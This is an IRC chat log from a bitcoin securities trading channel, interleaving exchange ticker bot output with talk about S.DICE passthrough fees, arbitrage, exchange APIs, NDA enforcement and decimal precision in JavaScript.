23:48:54 ;;ticker Feb 03 23:48:54 BTCUSD ticker | Best bid: 20.74243, Best ask: 20.78400, Bid-ask spread: 0.04157, Last trade: 20.74243, 24 hour volume: 32847.73945862, 24 hour low: 19.42000, 24 hour high: 20.78000, 24 hour vwap: 20.17951 Feb 03 23:48:55 but for any one specific option it may be tougher to hang in there, though the spread is large enough so it could work out well Feb 03 23:49:22 mjr_ the bot made 10k btc by hanging in there las tmionth. Feb 03 23:49:29 nice Feb 03 23:49:34 WOW Feb 03 23:49:46 is this jurov's or yours Feb 03 23:50:02 you know how mpex trades under s.mpoe ? Feb 03 23:50:07 yes Feb 03 23:50:08 that mpoe is the name of the options bot. Feb 03 23:50:20 ah ok Feb 03 23:50:34 so i don't know if i want my bot going up against yours lol Feb 03 23:50:39 mpex started out as an options trading page back in august 2011 Feb 03 23:50:52 was called mpoe then. Feb 03 23:50:53 lol, like, i made 10k last month but bragging about 38btc from coinbr instead :DDDD Feb 03 23:51:00 in february mpex opened, the two got merged in april iirc Feb 03 23:51:12 jurov sly dog :D Feb 03 23:51:16 [HAVELOCK] [SDICE] 1 @ 0.765 BTC [-] Feb 03 23:51:18 [HAVELOCK] [SDICE] 20 @ 0.76 = 15.2 BTC [-] Feb 03 23:51:51 you report havelocks but you can't fill their orders can you? or is that how it works... Feb 03 23:52:16 [HAVELOCK] [SDICE] 2 @ 0.76 = 1.52 BTC [-] Feb 03 23:52:29 huh ? Feb 03 23:52:37 i'm not sure if they keep their own inventory and you just report for pricing purposes or if whenever they get an order it comes here and is then filled Feb 03 23:53:00 assbot reports havelock, we assume havelock buys on mpex Feb 03 23:53:20 in general the pt operators buy on mpex and resell on w/e platform they use Feb 03 23:53:21 that would be corect Feb 03 23:53:21 it just seems like havelocks prices that they buy at are noticeably above what we see Feb 03 23:53:23 correct Feb 03 23:53:46 well, if they don't manage to buy on mpex in time the demand on the other venue may push prices up Feb 03 23:54:13 anything reported by assbot is an internal trade from one havelock customer to another Feb 03 23:54:32 i would buy S.DICE at .00724519 a share Feb 03 23:54:38 [MPEX] [S.MPOE] 4321 @ 0.00067407 = 2.9127 BTC [+] Feb 03 23:54:40 [MPEX] [S.MPOE] 6420 @ 0.00067418 = 4.3282 BTC [+] Feb 03 23:54:59 or at least i would start there and if i needed more would raise price up Feb 03 23:55:31 [MPEX] [S.MPOE] 4321 @ 0.00067395 = 2.9121 BTC [-] Feb 03 23:55:33 [MPEX] [S.MPOE] 28180 @ 0.00067418 = 18.9984 BTC [+] Feb 03 23:56:11 are all orders queued mircea_popescu? ie. one queue for all Feb 03 23:56:17 [HAVELOCK] [SDICE] 1 @ 0.76 BTC [-] Feb 03 23:56:40 i dun think so, havelock is a whole other platform Feb 03 23:57:32 the sdice on havelock is essential a collective investment scheme Feb 03 23:57:41 yes i know...but they again just paid...almost 5% more than market Feb 03 23:57:54 [MPEX] [S.MPOE] 4321 @ 0.00069984 = 3.024 BTC [+] Feb 03 23:57:57 [MPEX] [S.MPOE] 8129 @ 0.00069998 = 5.6901 BTC [+] Feb 03 23:58:04 and i know they have some sort of dividend holding thing going on Feb 03 23:58:13 mjr_: yes, but a lot of the people trading on havelock dont want to a) pay the mpex registration fee, and b) mess with gpg Feb 03 23:58:15 from what i heard last night Feb 03 23:58:19 mjr_: what?? Feb 03 23:58:21 ah ok Feb 03 23:58:21 dividend holdng? Feb 03 23:58:29 (note: i run havelock) Feb 03 23:58:30 i heard that they keep 5% or something Feb 03 23:58:36 of dividends Feb 03 23:58:46 oh, yes, for the S.DICE passthru, we pay out 95% of the dividend we receive from mpex Feb 03 23:58:51 management fee...i haven't researched, and i don't know Feb 03 23:58:55 yes exactly Feb 03 23:59:01 5% is our "Fee" essentially for running the passthru Feb 03 23:59:03 and i understand about fees Feb 03 23:59:10 so yeah, i get that Feb 03 23:59:34 i think that is a great business model, and all orders are denominated in lots of 100 right? Feb 03 23:59:46 !ticker m s.dice Feb 03 23:59:49 [MPEX:S.DICE] 1D: 0.00703438 / 0.0073593 / 0.007395 (221103 shares, 1,627.17 BTC), 7D: 0.00534524 / 0.00732904 / 0.00749999 (782480 shares, 5,734.83 BTC), 30D: 0.00085848 / 0.00510684 / 0.0075 (6074156 shares, 31,019.75 BTC) Feb 03 23:59:49 !ticker h s.dice Feb 03 23:59:54 Are you sure you have no tobacco? Feb 03 23:59:57 !ticker h sdice Feb 03 23:59:59 [HAVELOCK:SDICE] 1D: 0.75670000 / 0.78531261 / 0.83831111 (131 shares, 102.87595147 BTC), 7D: 0.56110000 / 0.75183841 / 0.89000000 (1573 shares, 1182.64181198 BTC), 30D: 0.44000000 / 0.58622355 / 0.89000000 (5772 shares, 3383.68232992 BTC) Feb 04 00:00:04 yes, 100 shares on mpex = 1 unit on havelock Feb 04 00:00:24 thanks topace Feb 04 00:00:25 why does assbot italicize the ask price Feb 04 00:00:36 as opposed to the bid price Feb 04 00:00:39 [BTCTC] [GSDPT] 633 @ 0.0074 = 4.6842 BTC [-] Feb 04 00:00:49 ;;calc (0.7853126 - 0.0073593*.95) Feb 04 00:00:50 0.778321265 Feb 04 00:00:54 am i supposed to put more importance on the offer side of things? Feb 04 00:00:57 ;;calc (0.007853126 - 0.0073593*.95) Feb 04 00:00:57 0.000861791 Feb 04 00:01:16 very theoretically speaking there's a 0.00086 per share arb oportunity between the two atm Feb 04 00:01:25 no... Feb 04 00:01:31 you didn't account for the 100 to 1 Feb 04 00:01:33 i believe Feb 04 00:01:37 oh nm Feb 04 00:01:38 i did on the 2nd pass Feb 04 00:01:39 Lyspooner: i thought that assbot reported low / avg / high Feb 04 00:01:45 ah ok Feb 04 00:01:58 ok thanks, i see that Feb 04 00:02:09 avg of what, the low and high? Feb 04 00:02:11 i wasn't thinking of arbing it Feb 04 00:02:16 [HAVELOCK] [SDICE] 26 @ 0.76 = 19.76 BTC [-] Feb 04 00:02:23 Lyspooner vwap for the interval Feb 04 00:02:52 vwap as calculated tick for tick, trade by trade, or second for second? Feb 04 00:02:59 trade by trade Feb 04 00:03:14 i was just curious why they always seem to come in higher than best ask, is that automatically calculated for the size of order they asked for? Feb 04 00:03:15 what if there is no trade in 1d interval Feb 04 00:03:23 avg is 0 Feb 04 00:03:46 mjr_ huh ? Feb 04 00:04:04 !ticker m o.btcusd.p330n Feb 04 00:04:05 [MPEX:O.BTCUSD.P330N] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Feb 04 00:04:30 lol kakobreklaa check it out. inconsistent behaviour Feb 04 00:04:42 ;; calc 0.00760000/0.00739500 Feb 04 00:04:42 1.0277214334 Feb 04 00:04:53 mjr_: you mean, the buys on havelock often come in higher than the best ask on mpex Feb 04 00:04:59 they asked for s.dice at 2.7% higher than the best offer Feb 04 00:05:02 yes Feb 04 00:05:07 mircea_popescu, its the way of the road, bud. Feb 04 00:05:11 it's probably because havelock is trading based on a 'personal' inventory Feb 04 00:05:11 that is what doesn't makes sense to me Feb 04 00:05:15 weeks are speshul ? Feb 04 00:05:23 [MPEX] [S.DICE] 400 @ 0.007395 = 2.958 BTC [+] Feb 04 00:05:28 i have no clue tbh. Feb 04 00:05:31 and only buys on mpex when out of inventory Feb 04 00:05:31 mjr_: the trades you see from havelock are BETWEEN havelock users Feb 04 00:05:32 ah personal inventory held in mpex Feb 04 00:05:41 oh ok Feb 04 00:05:42 thanks Feb 04 00:05:44 we hold 425000 shares of SDICE in mpex, and our users trade that Feb 04 00:05:47 mjr_ dood. you know what depositary receipts are ? Feb 04 00:05:51 yes Feb 04 00:06:01 sort of like, how bp trades in ny but is listed in london ? Feb 04 00:06:05 something of that nature. Feb 04 00:06:12 yeah i get it Feb 04 00:06:16 [HAVELOCK] [SDICE] 3 @ 0.765 = 2.295 BTC [+] Feb 04 00:06:45 topace: does your setup allow for in-kind exchange? Feb 04 00:06:48 i thought these were trades between mpex users...but technically you are just reporting informative trading information from havelock users, correct? Feb 04 00:07:05 you know i don't run or maintain assbot do you ? Feb 04 00:07:06 ie. that is more market data Feb 04 00:07:08 smickles: in kind exchnge? Feb 04 00:07:11 mjr_: assbot is run by kakobreklaa independant of mpex Feb 04 00:07:23 oh, was not aware Feb 04 00:07:30 yeah. i just troll here. Feb 04 00:07:30 assbit us assdependant. Feb 04 00:07:34 eh assbot Feb 04 00:07:40 lrn2spill. Feb 04 00:07:47 topace: say i had 100000 s.dice, can i give you them for 1000 sdice on havelock? Feb 04 00:08:06 Units of the fund ARE convertible to shares on MPEX at 1 unit = 100 shares PUSHED to your MPEX account for a fixed fee of 10 BTC per transfer (fee subject to change). Contact us by email to initiate a transfer. Feb 04 00:08:13 (so many mispellings) Feb 04 00:08:17 he's talking the other way topace Feb 04 00:08:33 ah yes, never though tof that, but yes i dont see why not Feb 04 00:08:44 cause he wants to arb lol Feb 04 00:08:46 but again, for a fairly large, per-trasnaction fee, becuase that would be all manual on my side Feb 04 00:09:06 yeah defintely wouldn't be worth it for arb lol Feb 04 00:09:38 thanks for explaining though Feb 04 00:09:39 awww i remember the good old days when there were only a few new accts a day ;/ Feb 04 00:09:54 i was just always confused why they wouldn't lift the ask Feb 04 00:10:05 the original thought process of making the units convertable, was tha tpeople might start buying on havelock with a low initial investment, and build up to the point that it'd be worth it for them to stop paying our 5% management fee and move their units direct to mpex Feb 04 00:10:13 topace: why not lower the fee, and limit it by requireing large volume? Feb 04 00:10:41 smickles: i could do that too, im open to suggestions Feb 04 00:10:58 as mircea_popescu calculated...it would be very hard to overcome practically any fee Feb 04 00:11:07 i think Feb 04 00:11:48 i should have done math before i say that Feb 04 00:13:08 hey mjr_, wanna borrow a crapload of s.dice to arb with :) Feb 04 00:13:12 .0008 is close to 10% Feb 04 00:13:18 lol Feb 04 00:13:26 i was just doing that math Feb 04 00:13:34 btctalkdown? Feb 04 00:13:50 Bowjov it was down a fwew hours ago Feb 04 00:13:51 yes Feb 04 00:13:55 hey umm Feb 04 00:14:00 how much s.dice paid total div? Feb 04 00:14:03 and how much per share Feb 04 00:14:08 so i guess it would even make sense at current fees if you transferred enough Feb 04 00:14:14 like 2k total Anduck Feb 04 00:14:15 2000 Feb 04 00:14:18 2000? hmmm Feb 04 00:14:26 1700 the month before Feb 04 00:14:29 ok Feb 04 00:14:34 and less before that Feb 04 00:14:39 yeah Feb 04 00:14:46 still not bad Feb 04 00:15:05 ya like 5k total over lifetime Feb 04 00:15:09 also shares appreciated over the past month.. it was 0.xx32->0.0075 today Feb 04 00:15:12 2000 to 10000000 Feb 04 00:15:18 shares, right? Feb 04 00:15:22 thanks smickles but i think i should build up WoT before doing anything like that Feb 04 00:15:22 to 10mn Feb 04 00:15:29 im not gonna count your zeroesmess :D Feb 04 00:15:36 does anybody here use mt.gox socket.io interface ? Feb 04 00:15:50 heh, i thought you loved satoshis mircea_popescu ;) Feb 04 00:15:51 awkorama it's how clarkmoody works is it ? Feb 04 00:16:04 no idea what clarkmoody even is Feb 04 00:16:06 thats what i was thinking...but i think it has a fallback too... Feb 04 00:16:12 bitcoin.clarkmoody.com Feb 04 00:16:30 judging from the console down, yes Feb 04 00:16:34 awkorama: i have in the past, but it was flakey for me Feb 04 00:16:37 so there's yopuir answer Feb 04 00:16:39 so i stopped Feb 04 00:16:42 in general when forum is down gox is down Feb 04 00:16:48 cause that 5k server they have is shared. Feb 04 00:17:01 lol...7 Feb 04 00:17:02 so are you hammering the REST interface instead ? Feb 04 00:17:11 why dont they have separate servers... Feb 04 00:17:30 I need a live(ish) stream of ticker Feb 04 00:17:32 speaking of which, do you have any api limits mircea_popescu? i can slow down my bot if you like Feb 04 00:17:35 Anduck a better question is, why doesn't the forum use some of that 5k btc it has collected over the years Feb 04 00:17:39 and get some motherfucking hosting Feb 04 00:17:48 mjr_ you have a bot ? Feb 04 00:17:52 could use bitvps Feb 04 00:17:55 just to check prices Feb 04 00:17:56 too much asked xDD Feb 04 00:18:18 it goes to theymos' personal fund.. in which he replenishes those btc he sold at a rate of 1k btc per dollar Feb 04 00:18:19 mjr_ so use somethingsensible, not like they change that often Feb 04 00:18:19 i showed the output, it calculates spread based on lowest ask and highest bid Feb 04 00:18:36 so i am just grabbing the jsonmarket depth Feb 04 00:18:48 awkorama: i switched to something that doesn't require me to be 'up to the second' on gox Feb 04 00:18:50 how often ? Feb 04 00:18:58 i think once every 3 seconds? Feb 04 00:19:02 is that too much? Feb 04 00:19:13 do you actually need it that precise ? Feb 04 00:19:18 well not now... Feb 04 00:19:21 i will slow it down Feb 04 00:19:32 but if it were to place orders i would like it to be as precise as possible Feb 04 00:19:41 smickles: I understand that you don't want to share your secret... Feb 04 00:19:42 moreso to check stat Feb 04 00:19:52 so watch some ticker and update when it moves Feb 04 00:20:00 good idea Feb 04 00:20:16 awkorama: no secret, i've moved to trading options on mpex, rather than spot on gox Feb 04 00:20:30 lol smickles that's what all the cool kids do Feb 04 00:20:34 oh ok, doesn't help me then, thanks anyway :) Feb 04 00:21:05 spot is way too hard Feb 04 00:21:10 because of fees Feb 04 00:21:13 awkorama: your best bet, afaik, is to use the websocket api, and failover to rest Feb 04 00:21:33 and you have to leave money all over the place for long periods of time Feb 04 00:21:39 as in, if I don't receive a websocket update in 10 seconds, hammer the REST ? Feb 04 00:21:51 awkorama: maybe have a redundency with bitcoincharts' stream (if they still have it) Feb 04 00:22:15 i wish someone had multicast market data, that would be so nice Feb 04 00:22:20 you reckon they would have a different source than me ? Feb 04 00:22:37 pubnub it ? Feb 04 00:22:59 bitcoincharts might get lucky where you don't Feb 04 00:23:05 's my logic Feb 04 00:23:22 mmkay Feb 04 00:24:10 i will try to integrate an rss feed reader...i think, that could work right? which would be the first to update? Feb 04 00:24:11 mjr_: ever lurked in #bitcoin-market? Feb 04 00:24:31 in there now Feb 04 00:24:39 but this is the funnest of all the btc related rooms Feb 04 00:24:50 that's kinda multicast market data Feb 04 00:25:08 and now for something completely different, is there a concept of NDA in bitcoin world at all ? Feb 04 00:25:10 yeah...kinda...i meant more like tcp multicast ie. i can join a group Feb 04 00:25:19 awkorama: yes Feb 04 00:25:20 the only thing i want from bitcointalk is doog's data Feb 04 00:25:21 >_> Feb 04 00:25:30 awkorama: nice rocky and bullwinkle reference :) Feb 04 00:25:31 smickles: how does it work ? Feb 04 00:26:24 awkorama: either with a wink and a nod, or contracts Feb 04 00:26:36 from my personal exp., that is Feb 04 00:26:41 contracts are enforced through WoT right? Feb 04 00:26:47 yup Feb 04 00:27:09 Has anyone ordered from Avalon batch no.2 successfully? Feb 04 00:27:11 hmmm difficult with NDA then...you probably are trying to assure they don't tell someone outside of here (i am assuming) Feb 04 00:27:30 not tell anyone Feb 04 00:27:34 not even people here Feb 04 00:27:46 well yeah, if they told people here you may be able to find out about it Feb 04 00:27:50 mjr_: you could set up the contract in such a way that it's enforceable 'IRL' Feb 04 00:28:05 IRL sucks, WoT sounds much better Feb 04 00:28:09 if they told someone who they new IRL, how would you find out that they new? I am guessing you have abusiness idea Feb 04 00:28:24 *knew Feb 04 00:28:26 yes, and I am looking for an investor Feb 04 00:28:35 yes lol, me too Feb 04 00:28:41 and we could have the same idea Feb 04 00:28:57 and it might suck. Feb 04 00:29:11 it would be very hard to show that the person you told, then told me Feb 04 00:29:19 mjr_: consider how often that could happen with 'regular' NDAs Feb 04 00:29:29 that was more my point Feb 04 00:29:35 heh Feb 04 00:29:35 NDA is very hard to enforce Feb 04 00:29:40 except in issues of code Feb 04 00:29:47 it can harm someone's reputation though Feb 04 00:29:49 true Feb 04 00:30:01 i have already said my idea on here publicly Feb 04 00:30:09 I wonder whether that can be enforced through cryptography somehow Feb 04 00:30:10 if someone else does it that is fine too Feb 04 00:30:39 it's tough, if they are intended to receive the message...they can retransmit it's cleartext Feb 04 00:30:59 yes they can, but can i then proove that they got the message from me ? Feb 04 00:31:09 and that is the end of the scope of encryption...i have been thinking about that a lot lately, the inability to create an unrepeatable message Feb 04 00:31:10 and thus harm their reputation Feb 04 00:31:24 no...not in any way i can think of Feb 04 00:31:27 there are fancy ways of embedding hidden data in documents Feb 04 00:31:35 because they could call someone, and just verbally tell the idea Feb 04 00:31:45 this same issue is what started SnapChat Feb 04 00:31:53 ok.. I write my business idea in a message Feb 04 00:31:57 but they ran into issues right away Feb 04 00:32:05 because you can take a screenshot Feb 04 00:32:19 so they added a feature to check if you took a screenshot Feb 04 00:32:25 so people can take picture with other device... Feb 04 00:32:39 CoinBr.iDiff-E difficulty future now available from ฿0.040! Buy till it lasts :D Feb 04 00:32:52 on bitfunder Feb 04 00:32:55 when's e mature? Feb 04 00:32:57 messages by their very nature are repeatable...even if on other medium Feb 04 00:32:59 Feb 20 Feb 04 00:33:05 so that's what makes it tough Feb 04 00:33:09 ;;bc,diff Feb 04 00:33:09 2968775.3320751 Feb 04 00:33:09 and send the hash of that message to whole network Feb 04 00:33:18 no i get it, you could do that Feb 04 00:33:20 or rather to whole WoT Feb 04 00:33:26 but they could read it out loud to someone Feb 04 00:33:31 then I send it plaintext to investor Feb 04 00:33:44 and how would you verify that what the person HEARD was related to what you WROTE Feb 04 00:33:48 and if the investor implements it without me, I can proove that he broke the NDA Feb 04 00:34:02 bitcointalk is now back on Feb 04 00:34:04 GG Feb 04 00:34:10 lol, gg Feb 04 00:34:10 well the project would be discribed in detail Feb 04 00:34:15 dont forget you maxitrol drops. Feb 04 00:34:25 so it get be publicly identified if it went live Feb 04 00:34:31 i guess the problem in this case specifically would be in that yes if he implemented it EXACTLY as you had specified, you could sue Feb 04 00:35:04 but if he says he was "inspired by" or it was "similar to something i was already doing"...that is what makes it a gray area Feb 04 00:35:10 a public hash of the idea, and proof you talked to the scammer. Feb 04 00:35:15 look at facebook, zuckerberg and the winklevoss Feb 04 00:35:19 well.. then the WoT would decide whether he broke the NDA or not Feb 04 00:35:30 yes Feb 04 00:35:37 the grey area is not something I would decide Feb 04 00:36:19 i would say that a picture with a timestamp, or something like that is proof as well Feb 04 00:36:23 or mail it to yourself Feb 04 00:36:48 or email it to someone secure so they have a record of it being emailed at a certain date and time Feb 04 00:37:02 yeah, but checksum is enough in this case Feb 04 00:37:09 ... Feb 04 00:37:16 [HAVELOCK] [HIM] 2 @ 14.9 = 29.8 BTC [+] Feb 04 00:37:18 if he decides to post your exact plan Feb 04 00:37:26 then yes you can verify with checksum Feb 04 00:37:32 but if he changes the name on it... Feb 04 00:37:37 the checksum would no longer match Feb 04 00:38:13 so if he decided to share with other people your exact idea, and not even bother taking your name off it and replacing it with his own, you could prove that he was using your idea Feb 04 00:38:23 [BTCTC] [COGNITIVE] 4 @ 0.3099 = 1.2396 BTC [-] Feb 04 00:38:46 plagiarists rarely do that, haven't we all kinda paraphrased stuff for our papers after copy pasting? Feb 04 00:38:57 [BTCTC] [GSDPT] 2 @ 0.0075 = 0.015 BTC [+] Feb 04 00:38:59 [BTCTC] [GSDPT] 1098 @ 0.0075 = 8.235 BTC [+] Feb 04 00:39:08 mjr_: no.. because if he implements the project, it would be public Feb 04 00:39:17 [HAVELOCK] [KCIM] 5 @ 1 = 5 BTC [+] Feb 04 00:39:26 and then I can publish the plaintext prooving that it was indeed me who created the idea in the first place Feb 04 00:39:33 yes Feb 04 00:39:50 [BTCTC] [BTC-BOND] 50 @ 0.01 = 0.5 BTC [+] Feb 04 00:39:57 that is if his idea is so closely related to yours that it is provably the same Feb 04 00:40:04 and that is why NDA is hard Feb 04 00:40:16 [HAVELOCK] [SDICE] 10 @ 0.765 = 7.65 BTC [+] Feb 04 00:40:22 ie. could someone have come up with this on their own? Feb 04 00:40:25 yes, but that is NDA in general, not in virtual Feb 04 00:40:38 world especially Feb 04 00:40:41 [BTCTC] [GSDPT] 2690 @ 0.0075 = 20.175 BTC [+] Feb 04 00:40:45 remember...newton and leibniz "invented" calculus pretty much simultaneously Feb 04 00:40:52 separately Feb 04 00:40:58 so... Feb 04 00:40:58 anybody can come up with idea, nobody really implemented it (or so does google tell me) Feb 04 00:41:06 yeah i know Feb 04 00:41:13 so if he implements it...he can say, i had this idea Feb 04 00:41:30 again it is a judgement call Feb 04 00:41:35 i am just playing devil's advocate Feb 04 00:41:41 and you are right Feb 04 00:41:45 this is a huge debate Feb 04 00:41:56 intelectual property is one of the fastest growing areas of law Feb 04 00:42:05 as a member of pirate party, I would know Feb 04 00:42:07 and one of the hardest to actually decide Feb 04 00:42:19 anyway Feb 04 00:42:42 for example...is it that unique to do my idea? (no one has done it yet) Feb 04 00:42:49 i think it's obvious to me Feb 04 00:43:05 maybe I just hack some code together quickly and push it live without an investor and then arange an IPO to raise some starting funds Feb 04 00:43:19 e.g. going public with the idea but calling out to pool of investors Feb 04 00:43:21 IPO is tough in btc world Feb 04 00:43:27 is it ? Feb 04 00:43:29 i like your idea Feb 04 00:43:32 well... Feb 04 00:43:38 IPO will probably involve SEC Feb 04 00:43:53 (almost definitely is actually more accurate, except for a few loopholes) Feb 04 00:43:55 IPO on MPEX ? Feb 04 00:44:00 oh, no Feb 04 00:44:03 never mind Feb 04 00:44:09 in that case great idea and i would do that Feb 04 00:44:32 thought you meant investors in the sense of venture capital firms Feb 04 00:44:42 or angel investors Feb 04 00:44:58 no.. I want to keep this all on net, no country involved Feb 04 00:44:59 coinbase got 600k and they went through YCombinator Feb 04 00:45:12 and i like that style a lot Feb 04 00:45:33 i would like to do mine that way, but it wouldn't really work Feb 04 00:45:54 and in my opinion, coinbase did not do anything new Feb 04 00:46:15 online wallet and very limited exchange with bank linking Feb 04 00:46:34 great UI though, and they made it easier Feb 04 00:46:48 doesn't anyone just use bootstrap.js for ui ? Feb 04 00:46:54 (I do, anyway) Feb 04 00:46:55 lol Feb 04 00:46:55 :) Feb 04 00:47:10 very true L33T css3 rounded corners and drop shadows Feb 04 00:47:27 yeah i like bootstrap and jquery Feb 04 00:47:27 [BTCTC] [BTC-BOND] 1 @ 0.0098 BTC [-] Feb 04 00:47:28 [BTCTC] [BTC-BOND] 1 @ 0.0098 BTC [-] Feb 04 00:48:05 Also this is the first project I went js only (including server side), so I realized how much I suck at js :) Feb 04 00:48:15 ooh nice, node.js? Feb 04 00:48:16 according to BFL, I can still get an asic if I win their "lottery" system, even if I pre order today? Feb 04 00:48:27 yes Feb 04 00:48:31 awesome Feb 04 00:48:37 i really like that Feb 04 00:48:45 multiple node.js instances communicating with each other through rabbitmq. Feb 04 00:48:54 also super awesome Feb 04 00:48:59 i think that is the future Feb 04 00:49:03 event driven Feb 04 00:49:08 well.. my application is very event driven Feb 04 00:49:20 but I have zero pulls in it Feb 04 00:49:28 everything is pushed Feb 04 00:49:31 what db? mongo? Feb 04 00:49:41 postgre Feb 04 00:49:44 that's cool Feb 04 00:49:52 I am not very skilled with nosql, yet Feb 04 00:49:56 so wanted to go the safe way Feb 04 00:50:06 me neither, but luckily, it is very (almost exactly) js Feb 04 00:50:16 it's all just json in mongo Feb 04 00:50:21 Also I am not sure about mongo supporting arbitrary precision mathematics Feb 04 00:50:28 yeah that i don't know Feb 04 00:50:32 I mean datatypes in general suck in js Feb 04 00:50:45 i think you can set precision can't you Feb 04 00:50:59 but i personally hate strongly typed so you may be talking to the wrong person about that Feb 04 00:51:05 if it's just js Number type then NO Feb 04 00:51:10 because that is just 64 bit float Feb 04 00:51:32 is that not more than enough precision? Feb 04 00:51:36 no Feb 04 00:51:40 ... Feb 04 00:52:46 132.32 * 10 = 1323.199999 Feb 04 00:52:49 1.0000000000000002 Feb 04 00:52:50 so not ideal Feb 04 00:52:57 smallest 64 bit number greater than 1 Feb 04 00:52:57 when dealing with stuff like money Feb 04 00:53:11 15 decimal places? even btc only goes down to 8 Feb 04 00:53:24 I would be happy with two Feb 04 00:53:36 but no rounding, doing proper decimal calculations Feb 04 00:54:48 https://github.com/iriscouch/bigdecimal.js this may help Feb 04 00:55:03 i have no idea Feb 04 00:55:10 but just a quick glance Feb 04 00:55:38 no float is ever really accurate in the grand scheme of things Feb 04 00:55:42 yes, but what about storage Feb 04 00:55:52 more philosophically than in practice Feb 04 00:56:00 hmmm Feb 04 00:56:01 not sure Feb 04 00:56:03 mongo wouldn't be able to compare such numbers in where clause Feb 04 00:56:12 that's why I went with postgre Feb 04 00:56:43 so at least my data will be fine, even though my front-end right now does not deal in decimals Feb 04 00:57:19 well, one possible solution is to calc the decimal portion as an integer and then append it to another int Feb 04 00:57:25 using casting Feb 04 00:57:27 or something like that Feb 04 00:57:39 may not work Feb 04 00:57:57 but i think using tuples of numbers ie. int + float could be a possible solution Feb 04 00:58:01 ;;bc,24hprc Feb 04 00:58:08 Error: I tried to send you an empty message. Feb 04 00:58:37 anyway, you should check out angular.js...i want to do my next web project using that Feb 04 00:58:39 i love it Feb 04 00:59:17 [HAVELOCK] [SDICE] 15 @ 0.765 = 11.475 BTC [+] Feb 04 00:59:49 i was talking to jurov of how cool it'd be to build a really nice browser based trading platform Feb 04 01:00:11 with hot keys and everything Feb 04 01:01:05 sounds nice Feb 04 01:01:16 be sure to make it "mobile first" Feb 04 01:01:43 lol, ok, time to start coding a backup way to get the overall market 24hvwap Feb 04 01:03:06 hmmm Feb 04 01:03:12 i think mobile would be too restrictive Feb 04 01:03:25 i mean for trading at least Feb 04 01:03:48 what do you need for trading? Feb 04 01:03:56 [MPEX] [S.MPOE] 670622 @ 0.0007 = 469.4354 BTC [+] Feb 04 01:03:57 position list with pnl Feb 04 01:04:01 i would want charts from clark moody and depth of book, with prints (if it could get market data from mpex instead of mt. gox) Feb 04 01:04:03 charts Feb 04 01:04:11 yes, and then i would want hot keys Feb 04 01:04:17 as well as a positions window Feb 04 01:04:21 gestures on mobile Feb 04 01:04:24 and a stock list Feb 04 01:04:31 that could work Feb 04 01:04:33 and then add hotkeys for desktop version Feb 04 01:04:50 but i would say angular is great for this sort of thing Feb 04 01:04:54 and node.js in the back Feb 04 01:05:22 and socket.io in between Feb 04 01:05:35 or pubnub if you go large Feb 04 01:05:36 why can't one use ints exclusively? and rounded floats only for display? Feb 04 01:06:12 jurov: that might work, you need to remember for each column though, how many decimal places you have there Feb 04 01:06:23 and also choose it at the beginning of development Feb 04 01:06:41 kakobreklaa: assbot down. i'm sure there's serious activity on s.mpoe atm Feb 04 01:08:16 looks like we are rallying once again Feb 04 01:08:17 kako i suspect you. really looks like you turn the light off, did the trades, started assbot again Feb 04 01:08:25 alright guys, leaving for today, nice chatting to you, g/n Feb 04 01:08:38 yeah very fun awkorama good luck Feb 04 01:09:18 i for one think i am going to start using satoshi's as my unit Feb 04 01:09:34 decimals get way too hard to remember cuz we don't really have a great way to say numbers like that Feb 04 01:10:25 like saying S.DICE is at 724,159 satoshis Feb 04 01:11:03 is a lot easier than 0.00724159 Feb 04 01:11:11 how would you pronounce that Feb 04 01:12:17 [HAVELOCK] [SDICE] 10 @ 0.765 = 7.65 BTC [+] Feb 04 01:13:29 and i think humans are meant to think in integers...if i said give me a hundred million satoshis, and you said ok i'm gonna charge you 500 for the transfer or 50,000 for the transfer it's a lot easier for me to make sense of the terms, cuz they are the same way you would say them Feb 04 01:13:29 7241.59 microbitcoins Feb 04 01:13:45 i like that too Feb 04 01:14:25 micro is how many places? Feb 04 01:14:59 oh never mind i think i get it...a microbitcoin would be the equivalent of a dollar (2 decimals) Feb 04 01:15:48 [MPEX] [S.MPOE] 600 @ 0.00069116 = 0.4147 BTC [-] Feb 04 01:16:11 jurov: that would be one nice thing about a trading platform...you wouldn't have to type so many nubmers Feb 04 01:17:19 one-click price setting - patent pending for coinbr Feb 04 01:17:31 haha Feb 04 01:18:35 kakobreklaa: assbot is definitely missing trades Feb 04 01:18:54 see live.coinbr.com Feb 04 01:18:58 [BTCTC] [B.YABMC] 1 @ 0.0249 BTC [+] Feb 04 01:20:44 jurov is lying Feb 04 01:21:26 !ticker m s.mpoe Feb 04 01:21:27 [MPEX:S.MPOE] 1D: 0.00066214 / 0.00068429 / 0.0007 (3568671 shares, 2,442.02 BTC), 7D: 0.00063335 / 0.00066702 / 0.0007 (14253174 shares, 9,507.24 BTC), 30D: 0.00059445 / 0.00065922 / 0.0007 (58426262 shares, 38,516.32 BTC) Feb 04 01:22:06 !ticker m s.dice Feb 04 01:22:07 [MPEX:S.DICE] 1D: 0.00703438 / 0.00736168 / 0.007395 (228303 shares, 1,680.70 BTC), 7D: 0.00534524 / 0.00731648 / 0.00749999 (709727 shares, 5,192.71 BTC), 30D: 0.00085848 / 0.00511159 / 0.0075 (6083409 shares, 31,095.93 BTC) Feb 04 01:31:01 [BTCTC] [BASIC-MINING] 9 @ 0.35 = 3.15 BTC [+] Feb 04 01:38:28 [MPEX] [S.MPOE] 25000 @ 0.0007 = 17.5 BTC [+] Feb 04 01:38:34 [MPEX] [S.DICE] 415 @ 0.0072416 = 3.0053 BTC [-] Feb 04 01:38:36 [MPEX] [S.DICE] 385 @ 0.0072132 = 2.7771 BTC [-] Feb 04 01:38:41 [MPEX] [S.DICE] 50 @ 0.0072132 = 0.3607 BTC [-] Feb 04 01:38:44 [MPEX] [S.MPOE] 600 @ 0.00069116 = 0.4147 BTC [-] Feb 04 01:38:47 [MPEX] [S.MPOE] 6000 @ 0.0007 = 4.2 BTC [+] Feb 04 01:38:49 [MPEX] [S.MPOE] 7800 @ 0.00069754 = 5.4408 BTC [-] Feb 04 01:38:50 [MPEX] [S.MPOE] 10500 @ 0.00069754 = 7.3242 BTC [-] Feb 04 01:38:56 [MPEX] [S.MPOE] 4500 @ 0.0007 = 3.15 BTC [+] Feb 04 01:39:43 kakobreklaa: did you code assbot? where does it get it's data from for MPEX? (rss?) Feb 04 01:39:50 [MPEX] [S.MPOE] 18479 @ 0.00069002 = 12.7509 BTC [-] Feb 04 01:41:30 its* Feb 04 01:42:45 mpex either grandfathered into assbot pulling from mpex's twitter feed, or mp has upgraded to pushing to 